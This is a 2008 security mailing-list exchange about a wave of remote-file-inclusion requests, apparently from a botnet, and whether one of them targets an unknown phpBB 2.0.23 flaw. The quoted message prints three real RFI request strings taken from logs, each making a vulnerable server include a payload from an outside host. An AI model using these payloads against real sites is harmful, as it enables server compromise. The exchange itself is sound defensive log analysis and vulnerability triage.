[VIM] RFI BotNet and phpBB 0-day?

str0ke str0ke at milw0rm.com
Thu Mar 20 13:35:28 UTC 2008 

How goes it Brian,

If your bored I have a few rfi's for you to go through :)

# wc -l
todays-rfi-bots.txt                                                                                                                                                                                       

   44737 todays-rfi-bots.txt

The file will show the number of uniq entries that have hit milw0rm in
the past 24 hours requesting http inclusions.  People forget to remove
milw0rm from their rfi scans.

/str0ke

security curmudgeon wrote:
>
> For a while i've noticed a ton of RFI requests made to attrition.org,
> the frequency and patterns suggest it's a large botnet possibly. I
> haven't had time to really dig into the logs and learn much about it.
> Tonight I saw one request come across and got curious how many of
> these requests were published vulnerabilities versus potential 0-day.
> Many requests don't have enough information to easily determine the
> software (e.g. /dir/index.php?id=http://), but this may:
>
> /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
>
>
> I don't see reference to "page_tail.php" in CVE or OSVDB. The
> directory structure suggests it is either in Claroline or phpBB though.
>
> http://www.claroline.net/download/stable.html
>
> Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file
> above.
>
> http://www.phpbb.com/downloads/
>
> Version 2.0.23 ("legacy") has "page_tail.php" in it.
>
> Version 3.0.0 (phpBB3) has no file by that name.
>
> -- 
>
> So, does anyone want to see if it is truly vulnerable? If so, we know
> it's phpBB 2.0.23 (and maybe prior), we know the file name and
> variable, and we know it is actively being exploited in the wild and
> discovered as a result of it.
>
> Brian
>
>
>
> p.s. While writing this, a full example of one that would be a tad
> harder to track down, but given the "com_comprofiler" and
> "mosConfig_absolute_path", shouldn't be that difficult:
> /index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f
>
>
> p.p.s. And an example of an older disclosed vulnerability being used:
> /squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f
>
> (CVE-2006-2483 / OSVDB 25523)
>

More information about the VIM mailing list